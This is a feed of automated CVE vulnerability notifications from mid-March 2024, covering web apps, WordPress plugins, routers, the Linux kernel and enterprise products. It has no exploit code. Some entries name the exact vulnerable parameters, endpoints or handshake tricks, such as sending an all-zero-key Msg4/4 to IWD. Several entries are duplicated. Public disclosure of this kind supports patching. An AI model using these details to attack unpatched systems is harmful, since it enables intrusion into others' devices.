🚨 CVE-2024-2518A vulnerability was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0 and classified as problematic. This issue affects some unknown processing of the file book_history.php. The manipulation of the argument id leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256955. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-16 12:37:25 |
🚨 CVE-2024-2517A vulnerability has been found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0 and classified as critical. This vulnerability affects unknown code of the file book_history.php. The manipulation of the argument del_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-256954 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-16 12:37:24 |
🚨 CVE-2024-2516A vulnerability, which was classified as critical, was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. This affects an unknown part of the file home.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256953 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-16 09:37:24 |
🚨 CVE-2024-1857The Ultimate Gift Cards for WooCommerce – Create, Redeem & Manage Digital Gift Certificates with Personalized Templates plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.6 via the wps_wgm_preview_email_template(). This makes it possible for unauthenticated attackers to read password protected and draft posts that may contain sensitive data.🎖@cveNotify |
|
| 2024-03-16 07:37:24 |
🚨 CVE-2024-22513djangorestframework-simplejwt version 5.3.1 and before is vulnerable to information disclosure. A user can access web application resources even after their account has been disabled due to missing user validation checks via the for_user method.🎖@cveNotify |
|
| 2024-03-16 06:37:30 |
🚨 CVE-2024-28639Buffer Overflow vulnerability in TOTOLink X5000R V9.1.0u.6118-B20201102 and A7000R V9.1.0u.6115-B20201022, allow remote attackers to execute arbitrary code and cause a denial of service (DoS) via the IP field.🎖@cveNotify |
|
| 2024-03-16 06:37:26 |
🚨 CVE-2024-28070A vulnerability in the legacy chat component of Mitel MiContact Center Business through 10.0.0.4 could allow an unauthenticated attacker to conduct a reflected cross-site scripting (XSS) attack due to insufficient input validation. A successful exploit could allow an attacker to access sensitive information and gain unauthorized access.🎖@cveNotify |
|
| 2024-03-16 06:37:25 |
🚨 CVE-2024-1733The Word Replacer Pro plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the word_replacer_ultra() function in all versions up to, and including, 1.0. This makes it possible for unauthenticated attackers to update arbitrary content on the affected WordPress site.🎖@cveNotify |
|
| 2024-03-16 06:37:24 |
🚨 CVE-2024-1685The Social Media Share Buttons plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.1.0 via deserialization of untrusted input through the attachmentUrl parameter. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.🎖@cveNotify |
|
| 2024-03-16 05:37:25 |
🚨 CVE-2024-23523Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Elementor Pro.This issue affects Elementor Pro: from n/a through 3.19.2.🎖@cveNotify |
|
| 2024-03-16 05:37:24 |
🚨 CVE-2023-36483An authorization bypass was discovered in the Carrier MASmobile Classic application through 1.16.18 for Android, MASmobile Classic app through 1.7.24 for iOS, and MAS ASP.Net Services through 1.9. It can be achieved via session ID prediction, allowing remote attackers to retrieve sensitive data including customer data, security system status, and event history. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. The affected products cannot simply be updated; they must be removed, but can be replaced by other Carrier software as explained in the Carrier advisory.🎖@cveNotify |
|
| 2024-03-16 03:37:32 |
🚨 CVE-2024-1239The ElementsKit Elementor addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the blog post read more button in all versions up to, and including, 3.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-16 03:37:25 |
🚨 CVE-2024-1454The use-after-free vulnerability was found in the AuthentIC driver in OpenSC packages, occuring in the card enrolment process using pkcs15-init when a user or administrator enrols or modifies cards. An attacker must have physical access to the computer system and requires a crafted USB device or smart card to present the system with specially crafted responses to the APDUs, which are considered high complexity and low severity. This manipulation can allow for compromised card management operations during enrolment.🎖@cveNotify |
|
| 2024-03-16 03:37:24 |
🚨 CVE-2007-4559Directory traversal vulnerability in the (1) extract and (2) extractall functions in the tarfile module in Python allows user-assisted remote attackers to overwrite arbitrary files via a .. (dot dot) sequence in filenames in a TAR archive, a related issue to CVE-2001-1267.🎖@cveNotify |
|
| 2024-03-16 02:37:32 |
🚨 CVE-2023-52161The Access Point functionality in eapol_auth_key_handle in eapol.c in iNet wireless daemon (IWD) before 2.14 allows attackers to gain unauthorized access to a protected Wi-Fi network. An attacker can complete the EAPOL handshake by skipping Msg2/4 and instead sending Msg4/4 with an all-zero key.🎖@cveNotify |
|
| 2024-03-16 02:37:25 |
🚨 CVE-2023-5366A flaw was found in Open vSwitch that allows ICMPv6 Neighbor Advertisement packets between virtual machines to bypass OpenFlow rules. This issue may allow a local attacker to create specially crafted packets with a modified or spoofed target IP address field that can redirect ICMPv6 traffic to arbitrary IP addresses.🎖@cveNotify |
|
| 2024-03-16 02:37:24 |
🚨 CVE-2007-4559Directory traversal vulnerability in the (1) extract and (2) extractall functions in the tarfile module in Python allows user-assisted remote attackers to overwrite arbitrary files via a .. (dot dot) sequence in filenames in a TAR archive, a related issue to CVE-2001-1267.🎖@cveNotify |
|
| 2024-03-16 01:37:29 |
🚨 CVE-2023-51521Cross-Site Request Forgery (CSRF) vulnerability in ExpressTech Quiz And Survey Master.This issue affects Quiz And Survey Master: from n/a through 8.1.18.🎖@cveNotify |
|
| 2024-03-16 01:37:26 |
🚨 CVE-2023-51512Cross Site Request Forgery (CSRF) vulnerability in WBW Product Table by WBW.This issue affects Product Table by WBW: from n/a through 1.8.6.🎖@cveNotify |
|
| 2024-03-16 01:37:25 |
🚨 CVE-2023-51489Cross-Site Request Forgery (CSRF) vulnerability in Automattic, Inc. Crowdsignal Dashboard – Polls, Surveys & more.This issue affects Crowdsignal Dashboard – Polls, Surveys & more: from n/a through 3.0.11.🎖@cveNotify |
|
| 2024-03-16 01:37:24 |
🚨 CVE-2023-51407Cross-Site Request Forgery (CSRF) vulnerability in Rocket Elements Split Test For Elementor.This issue affects Split Test For Elementor: from n/a through 1.6.9.🎖@cveNotify |
|
| 2024-03-16 00:37:24 |
🚨 CVE-2024-28862The Ruby One Time Password library (ROTP) is an open source library for generating and validating one time passwords. Affected versions had overly permissive default permissions. Users should patch to version 6.3.0. Users unable to patch may correct file permissions after installation.🎖@cveNotify |
|
| 2024-03-15 23:37:25 |
🚨 CVE-2024-2514A vulnerability classified as critical was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. Affected by this vulnerability is an unknown functionality of the file /login.php. The manipulation of the argument email leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256951. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-15 23:37:24 |
🚨 CVE-2024-23298A logic issue was addressed with improved state management.🎖@cveNotify |
|
| 2024-03-15 21:37:32 |
🚨 CVE-2021-47114In the Linux kernel, the following vulnerability has been resolved:ocfs2: fix data corruption by fallocateWhen fallocate punches holes out of inode size, if original isize is inthe middle of last cluster, then the part from isize to the end of thecluster will be zeroed with buffer write, at that time isize is not yetupdated to match the new size, if writeback is kicked in, it will invokeocfs2_writepage()->block_write_full_page() where the pages out of inodesize will be dropped. That will cause file corruption. Fix this byzero out eof blocks when extending the inode size.Running the following command with qemu-image 4.2.1 can get a corruptedcoverted image file easily. qemu-img convert -p -t none -T none -f qcow2 $qcow_image \ -O qcow2 -o compat=1.1 $qcow_image.convThe usage of fallocate in qemu is like this, it first punches holes outof inode size, then extend the inode size. fallocate(11, FALLOC_FL_KEEP_SIZE|FALLOC_FL_PUNCH_HOLE, 2276196352, 65536) = 0 fallocate(11, 0, 2276196352, 65536) = 0v1: https://www.spinics.net/lists/linux-fsdevel/msg193999.htmlv2: https://lore.kernel.org/linux-fsdevel/20210525093034.GB4112@quack2.suse.cz/T/🎖@cveNotify |
|
| 2024-03-15 21:37:26 |
🚨 CVE-2021-47113In the Linux kernel, the following vulnerability has been resolved:btrfs: abort in rename_exchange if we fail to insert the second refError injection stress uncovered a problem where we'd leave a danglinginode ref if we failed during a rename_exchange. This happens becausewe insert the inode ref for one side of the rename, and then for theother side. If this second inode ref insert fails we'll leave the firstone dangling and leave a corrupt file system behind. Fix this byaborting if we did the insert for the first inode ref.🎖@cveNotify |
|
| 2024-03-15 21:37:25 |
🚨 CVE-2021-47110In the Linux kernel, the following vulnerability has been resolved:x86/kvm: Disable kvmclock on all CPUs on shutdownCurrenly, we disable kvmclock from machine_shutdown() hook and thisonly happens for boot CPU. We need to disable it for all CPUs toguard against memory corruption e.g. on restore from hibernate.Note, writing '0' to kvmclock MSR doesn't clear memory location, itjust prevents hypervisor from updating the location so for the shortwhile after write and while CPU is still alive, the clock remains usableand correct so we don't need to switch to some other clocksource.🎖@cveNotify |
|
| 2024-03-15 21:37:24 |
🚨 CVE-2021-47109In the Linux kernel, the following vulnerability has been resolved:neighbour: allow NUD_NOARP entries to be forced GCedIFF_POINTOPOINT interfaces use NUD_NOARP entries for IPv6. It's possible tofill up the neighbour table with enough entries that it will overflow forvalid connections after that.This behaviour is more prevalent after commit 58956317c8de ("neighbor:Improve garbage collection") is applied, as it prevents removal fromentries that are not NUD_FAILED, unless they are more than 5s old.🎖@cveNotify |
|
| 2024-03-15 20:56:33 |
None |
|
| 2024-03-15 19:37:25 |
🚨 CVE-2016-1244The extractTree function in unADF allows remote attackers to execute arbitrary code via shell metacharacters in a directory name in an adf file.🎖@cveNotify |
|
| 2024-03-15 19:37:24 |
🚨 CVE-2016-1243Stack-based buffer overflow in the extractTree function in unADF allows remote attackers to execute arbitrary code via a long pathname.🎖@cveNotify |
|
| 2024-03-15 18:37:25 |
🚨 CVE-2024-2193A Speculative Race Condition (SRC) vulnerability that impacts modern CPU architectures supporting speculative execution (related to Spectre V1) has been disclosed. An unauthenticated attacker can exploit this vulnerability to disclose arbitrary data from the CPU using race conditions to access the speculative executable code paths.🎖@cveNotify |
|
| 2024-03-15 18:37:24 |
🚨 CVE-2023-37605Weak Exception Handling vulnerability in baramundi software GmbH EMM Agent 23.1.50 and before allows an attacker to cause a denial of service via a crafted request to the password parameter.🎖@cveNotify |
|
| 2024-03-15 17:37:37 |
🚨 CVE-2024-2497A vulnerability was found in RaspAP raspap-webgui 3.0.9 and classified as critical. This issue affects some unknown processing of the file includes/provider.php of the component HTTP POST Request Handler. The manipulation of the argument country leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256919. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-15 17:37:36 |
🚨 CVE-2024-28401TOTOLINK X2000R before v1.0.0-B20231213.1013 contains a Store Cross-site scripting (XSS) vulnerability in Root Access Control under the Wireless Page.🎖@cveNotify |
|
| 2024-03-15 17:37:32 |
🚨 CVE-2023-7017Sciener locks' firmware update mechanism do not authenticate or validate firmware updates if passed to the lock through the Bluetooth Low Energy service. A challenge request can be sent to the lock with a command to prepare for an update, rather than an unlock request, allowing an attacker to compromise the device.🎖@cveNotify |
|
| 2024-03-15 17:37:31 |
🚨 CVE-2023-7007Sciener server does not validate connection requests from the GatewayG2, allowing an impersonation attack that provides the attacker the unlockKey field.🎖@cveNotify |
|
| 2024-03-15 17:37:30 |
🚨 CVE-2023-7004The TTLock App does not employ proper verification procedures to ensure that it is communicating with the expected device, allowing for connection to a device that spoofs the MAC address of a lock, which compromises the legitimate locks integrity.🎖@cveNotify |
|
| 2024-03-15 17:37:26 |
🚨 CVE-2023-6960TTLock App virtual keys and settings are only deleted client side, and if preserved, can access the lock after intended deletion.🎖@cveNotify |
|
| 2024-03-15 17:37:25 |
🚨 CVE-2024-20738Adobe FrameMaker Publishing Server versions 2022.1 and earlier are affected by an Improper Authentication vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass authentication mechanisms and gain unauthorized access. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2024-03-15 17:37:24 |
🚨 CVE-2022-48541A memory leak in ImageMagick 7.0.10-45 and 6.9.11-22 allows remote attackers to perform a denial of service via the "identify -help" command.🎖@cveNotify |
|
| 2024-03-15 16:37:42 |
🚨 CVE-2023-46179IBM Sterling Secure Proxy 6.0.3 and 6.1.0 does not set the secure attribute on authorization tokens or session cookies. Attackers may be able to get the cookie values by sending a http:// link to a user or by planting this link in a site the user goes to. The cookie will be sent to the insecure link and the attacker can then obtain the cookie value by snooping the traffic. IBM X-Force ID: 269683.🎖@cveNotify |
|
| 2024-03-15 16:37:41 |
🚨 CVE-2024-25593Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Basix NEX-Forms – Ultimate Form Builder allows Stored XSS.This issue affects NEX-Forms – Ultimate Form Builder: from n/a through 8.5.5.🎖@cveNotify |
|
| 2024-03-15 16:37:40 |
🚨 CVE-2024-25592Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPMU DEV Broken Link Checker allows Stored XSS.This issue affects Broken Link Checker: from n/a through 2.2.3.🎖@cveNotify |
|
| 2024-03-15 16:37:36 |
🚨 CVE-2024-2495Cryptographic key vulnerability encoded in the FriendlyWrt firmware affecting version 2022-11-16.51b3d35. This vulnerability could allow an attacker to compromise the confidentiality and integrity of encrypted data.🎖@cveNotify |
|
| 2024-03-15 16:37:35 |
🚨 CVE-2024-27193Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PayU PayU India allows Reflected XSS.This issue affects PayU India: from n/a through 3.8.2.🎖@cveNotify |
|
| 2024-03-15 16:37:31 |
🚨 CVE-2024-25936Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SoundCloud Inc., Lawrie Malen SoundCloud Shortcode allows Stored XSS.This issue affects SoundCloud Shortcode: from n/a through 4.0.1.🎖@cveNotify |
|
| 2024-03-15 16:37:30 |
🚨 CVE-2024-25921Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Concerted Action Action Network allows Reflected XSS.This issue affects Action Network: from n/a through 1.4.2.🎖@cveNotify |
|
| 2024-03-15 16:37:26 |
🚨 CVE-2024-25916Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Joseph C Dolson My Calendar allows Stored XSS.This issue affects My Calendar: from n/a through 3.4.23.🎖@cveNotify |
|
| 2024-03-15 16:37:25 |
🚨 CVE-2023-6725An access-control flaw was found in the OpenStack Designate component where private configuration information including access keys to BIND were improperly made world readable. A malicious attacker with access to any container could exploit this flaw to access sensitive information.🎖@cveNotify |
|
| 2024-03-15 16:37:24 |
🚨 CVE-2023-52322ecrire/public/assembler.php in SPIP before 4.1.13 and 4.2.x before 4.2.7 allows XSS because input from _request() is not restricted to safe characters such as alphanumerics.🎖@cveNotify |
|
| 2024-03-15 15:37:36 |
🚨 CVE-2024-28318gpac 2.3-DEV-rev921-g422b78ecf-master was discovered to contain a out of boundary write vulnerability via swf_get_string at scene_manager/swf_parse.c:325🎖@cveNotify |
|
| 2024-03-15 15:37:35 |
🚨 CVE-2023-51522Cross-Site Request Forgery (CSRF) vulnerability in Cozmoslabs Paid Member Subscriptions.This issue affects Paid Member Subscriptions: from n/a through 2.10.4.🎖@cveNotify |
|
| 2024-03-15 15:37:32 |
🚨 CVE-2023-51369Cross-Site Request Forgery (CSRF) vulnerability in SysBasics Customize My Account for WooCommerce.This issue affects Customize My Account for WooCommerce: from n/a through 1.8.3.🎖@cveNotify |
|
| 2024-03-15 15:37:31 |
🚨 CVE-2023-50886Cross-Site Request Forgery (CSRF), Incorrect Authorization vulnerability in wpWax Legal Pages.This issue affects Legal Pages: from n/a through 1.3.7.🎖@cveNotify |
|
| 2024-03-15 15:37:30 |
🚨 CVE-2023-46182IBM Sterling Secure Proxy 6.0.3 and 6.1.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 269692.🎖@cveNotify |
|
| 2024-03-15 15:37:26 |
🚨 CVE-2023-46179IBM Sterling Secure Proxy 6.0.3 and 6.1.0 does not set the secure attribute on authorization tokens or session cookies. Attackers may be able to get the cookie values by sending a http:// link to a user or by planting this link in a site the user goes to. The cookie will be sent to the insecure link and the attacker can then obtain the cookie value by snooping the traffic. IBM X-Force ID: 269683.🎖@cveNotify |
|
| 2024-03-15 15:37:25 |
🚨 CVE-2023-42789A out-of-bounds write in Fortinet FortiOS 7.4.0 through 7.4.1, 7.2.0 through 7.2.5, 7.0.0 through 7.0.12, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, FortiProxy 7.4.0, 7.2.0 through 7.2.6, 7.0.0 through 7.0.12, 2.0.0 through 2.0.13 allows attacker to execute unauthorized code or commands via specially crafted HTTP requests.🎖@cveNotify |
|
| 2024-03-15 15:37:24 |
🚨 CVE-2023-36554A improper access control in Fortinet FortiManager version 7.4.0, version 7.2.0 through 7.2.3, version 7.0.0 through 7.0.10, version 6.4.0 through 6.4.13, 6.2 all versions allows attacker to execute unauthorized code or commands via specially crafted HTTP requests.🎖@cveNotify |
|
| 2024-03-15 15:07:24 |
🚨 CVE-2023-48788A improper neutralization of special elements used in an sql command ('sql injection') in Fortinet FortiClientEMS version 7.2.0 through 7.2.2, FortiClientEMS 7.0.1 through 7.0.10 allows attacker to execute unauthorized code or commands via specially crafted packets.🎖@cveNotify |
|
| 2024-03-15 13:37:35 |
🚨 CVE-2024-27196Cross Site Scripting (XSS) vulnerability in Joel Starnes postMash – custom post order allows Reflected XSS.This issue affects postMash – custom post order: from n/a through 1.2.0.🎖@cveNotify |
|
| 2024-03-15 13:37:31 |
🚨 CVE-2024-27192Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Scott Reilly Configure SMTP allows Reflected XSS.This issue affects Configure SMTP: from n/a through 3.1.🎖@cveNotify |
|
| 2024-03-15 13:37:30 |
🚨 CVE-2024-25936Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SoundCloud Inc., Lawrie Malen SoundCloud Shortcode allows Stored XSS.This issue affects SoundCloud Shortcode: from n/a through 4.0.1.🎖@cveNotify |
|
| 2024-03-15 13:37:29 |
🚨 CVE-2024-25934Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FormFacade allows Stored XSS.This issue affects FormFacade: from n/a through 1.0.0.🎖@cveNotify |
|
| 2024-03-15 13:37:26 |
🚨 CVE-2024-25921Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Concerted Action Action Network allows Reflected XSS.This issue affects Action Network: from n/a through 1.4.2.🎖@cveNotify |
|
| 2024-03-15 13:37:25 |
🚨 CVE-2024-25598Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Livemesh Livemesh Addons for Elementor allows Stored XSS.This issue affects Livemesh Addons for Elementor: from n/a through 8.3.🎖@cveNotify |
|
| 2024-03-15 13:37:24 |
🚨 CVE-2023-6725An access-control flaw was found in the OpenStack Designate component where private configuration information including access keys to BIND were improperly made world readable. A malicious attacker with access to any container could exploit this flaw to access sensitive information.🎖@cveNotify |
|
| 2024-03-15 13:07:41 |
🚨 CVE-2024-1917Integer Overflow or Wraparound vulnerability in Mitsubishi Electric Corporation MELSEC-Q Series and MELSEC-L Series CPU modules allows a remote unauthenticated attacker to execute malicious code on a target product by sending a specially crafted packet.🎖@cveNotify |
|
| 2024-03-15 13:07:40 |
🚨 CVE-2024-1916Integer Overflow or Wraparound vulnerability in Mitsubishi Electric Corporation MELSEC-Q Series and MELSEC-L Series CPU modules allows a remote unauthenticated attacker to execute malicious code on a target product by sending a specially crafted packet.🎖@cveNotify |
|
| 2024-03-15 13:07:36 |
🚨 CVE-2024-0802Incorrect Pointer Scaling vulnerability in Mitsubishi Electric Corporation MELSEC-Q Series and MELSEC-L Series CPU modules allows a remote unauthenticated attacker to read arbitrary information from a target product or execute malicious code on a target product by sending a specially crafted packet.🎖@cveNotify |
|
| 2024-03-15 13:07:35 |
🚨 CVE-2024-26163Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-03-15 11:37:41 |
🚨 CVE-2024-27987Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GiveWP Give allows Reflected XSS.This issue affects Give: from n/a through 3.3.1.🎖@cveNotify |
|
| 2024-03-15 11:37:37 |
🚨 CVE-2024-23944Information disclosure in persistent watchers handling in Apache ZooKeeper due to missing ACL check. It allows an attacker to monitor child znodes by attaching a persistent watcher (addWatch command) to a parent which the attacker has already access to. ZooKeeper server doesn't do ACL check when the persistent watcher is triggered and as a consequence, the full path of znodes that a watch event gets triggered upon is exposed to the owner of the watcher. It's important to note that only the path is exposed by this vulnerability, not the data of znode, but since znode path can contain sensitive information like user name or login ID, this issue is potentially critical.Users are recommended to upgrade to version 3.9.2, 3.8.4 which fixes the issue.🎖@cveNotify |
|
| 2024-03-15 11:37:36 |
🚨 CVE-2024-21891Node.js depends on multiple built-in utility functions to normalize paths provided to node:fs functions, which can be overwitten with user-defined implementations leading to filesystem permission model bypass through path traversal attack.This vulnerability affects all users using the experimental permission model in Node.js 20 and Node.js 21.Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js.🎖@cveNotify |
|
| 2024-03-15 11:37:35 |
🚨 CVE-2024-21890The Node.js Permission Model does not clarify in the documentation that wildcards should be only used as the last character of a file path. For example:``` --allow-fs-read=/home/node/.ssh/*.pub```will ignore `pub` and give access to everything after `.ssh/`.This misleading documentation affects all users using the experimental permission model in Node.js 20 and Node.js 21.Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js.🎖@cveNotify |
|
| 2024-03-15 11:37:31 |
🚨 CVE-2024-0232A heap use-after-free issue has been identified in SQLite in the jsonParseAddNodeArray() function in sqlite3.c. This flaw allows a local attacker to leverage a victim to pass specially crafted malicious input to the application, potentially causing a crash and leading to a denial of service.🎖@cveNotify |
|
| 2024-03-15 11:37:30 |
🚨 CVE-2022-41854Those using Snakeyaml to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack overflow. This effect may support a denial of service attack.🎖@cveNotify |
|
| 2024-03-15 11:37:26 |
🚨 CVE-2022-38751Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.🎖@cveNotify |
|
| 2024-03-15 11:37:25 |
🚨 CVE-2022-38749Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.🎖@cveNotify |
|
| 2024-03-15 11:37:24 |
🚨 CVE-2022-25857The package org.yaml:snakeyaml from 0 and before 1.31 are vulnerable to Denial of Service (DoS) due missing to nested depth limitation for collections.🎖@cveNotify |
|
| 2024-03-15 10:37:26 |
🚨 CVE-2024-2490A vulnerability classified as critical was found in Tenda AC18 15.03.05.05. Affected by this vulnerability is the function setSchedWifi of the file /goform/openSchedWifi. The manipulation of the argument schedStartTime/schedEndTime leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256897 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-15 10:37:25 |
🚨 CVE-2024-2445Mattermost Jira plugin versions shipped with Mattermost versions 8.1.x before 8.1.10, 9.2.x before 9.2.6, 9.3.x before 9.3.2, and 9.4.x before 9.4.3 fail to escape user-controlled outputs when generating HTML pages, which allows an attacker to perform reflected cross-site scripting attacks against the users of the Mattermost server.🎖@cveNotify |
|
| 2024-03-15 10:37:24 |
🚨 CVE-2023-44324Adobe FrameMaker Publishing Server versions 2022 and earlier are affected by an Improper Authentication vulnerability that could result in a Security feature bypass. An unauthenticated attacker can abuse this vulnerability to access the API and leak default admin's password. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2024-03-15 09:37:26 |
🚨 CVE-2024-2489A vulnerability classified as critical has been found in Tenda AC18 15.03.05.05. Affected is the function formSetQosBand of the file /goform/SetNetControlList. The manipulation of the argument list leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256896. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-15 09:37:25 |
🚨 CVE-2024-28053Resource Exhaustion in Mattermost Server versions 8.1.x before 8.1.10 fails to limit the size of the payload that can be read and parsed allowing an attacker to send a very large email payload and crash the server.🎖@cveNotify |
|
| 2024-03-15 09:37:24 |
🚨 CVE-2024-24975Uncontrolled Resource Consumption in Mattermost Mobile versions before 2.13.0 fails to limit the size of the code block that will be processed by the syntax highlighter, allowing an attacker to send a very large code block and crash the mobile app.🎖@cveNotify |
|
| 2024-03-15 08:37:25 |
🚨 CVE-2024-28354There is a command injection vulnerability in the TRENDnet TEW-827DRU router with firmware version 2.10B01. An attacker can inject commands into the post request parameters usapps.@smb[%d].username in the apply.cgi interface, thereby gaining root shell privileges.🎖@cveNotify |
|
| 2024-03-15 08:37:24 |
🚨 CVE-2024-28353There is a command injection vulnerability in the TRENDnet TEW-827DRU router with firmware version 2.10B01. An attacker can inject commands into the post request parameters usapps.config.smb_admin_name in the apply.cgi interface, thereby gaining root shell privileges.🎖@cveNotify |
|
| 2024-03-15 07:37:30 |
🚨 CVE-2024-2485A vulnerability was found in Tenda AC18 15.03.05.05 and classified as critical. Affected by this issue is the function formSetSpeedWan of the file /goform/SetSpeedWan. The manipulation of the argument speed_dir leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256892. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-15 07:37:29 |
🚨 CVE-2024-2483A vulnerability, which was classified as problematic, has been found in Surya2Developer Hostel Management Service 1.0. This issue affects some unknown processing of the file /change-password.php of the component Password Change Handler. The manipulation of the argument oldpassword leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256889 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-15 07:37:26 |
🚨 CVE-2024-2399The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 4.10.23 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-15 07:37:25 |
🚨 CVE-2024-1796The HUSKY – Products Filter for WooCommerce Professional plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'woof' shortcode in all versions up to, and including, 1.3.5.1 due to insufficient input sanitization and output escaping on user supplied attributes such as 'swoof_slug'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-15 07:37:24 |
🚨 CVE-2024-1795The HUSKY – Products Filter for WooCommerce Professional plugin for WordPress is vulnerable to SQL Injection via the 'name' parameter in the woof shortcode in all versions up to, and including, 1.3.5.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-03-15 06:37:26 |
🚨 CVE-2024-2481A vulnerability, which was classified as critical, was found in Surya2Developer Hostel Management System 1.0. Affected is an unknown function of the file /admin/manage-students.php. The manipulation of the argument del leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-256890 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-15 06:37:25 |
🚨 CVE-2024-2478A vulnerability was found in BradWenqiang HR 2.0. It has been rated as critical. Affected by this issue is the function selectAll of the file /bishe/register of the component Background Management. The manipulation of the argument userName leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-256886 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-15 06:37:24 |
🚨 CVE-2024-25227SQL Injection vulnerability in ABO.CMS version 5.8, allows remote attackers to execute arbitrary code, cause a denial of service (DoS), escalate privileges, and obtain sensitive information via the tb_login parameter in admin login page.🎖@cveNotify |
|
| 2024-03-15 05:37:24 |
🚨 CVE-2024-2180Zemana AntiLogger v2.74.204.664 is vulnerable to a Memory Information Leak vulnerability by triggering the 0x80002020 IOCTL code of the zam64.sys and zamguard64.sys drivers🎖@cveNotify |
|
| 2024-03-15 03:37:24 |
🚨 CVE-2024-1622Due to a mistake in error checking, Routinator will terminate when an incoming RTR connection is reset by the peer too quickly after opening.🎖@cveNotify |
|
| 2024-03-15 02:37:24 |
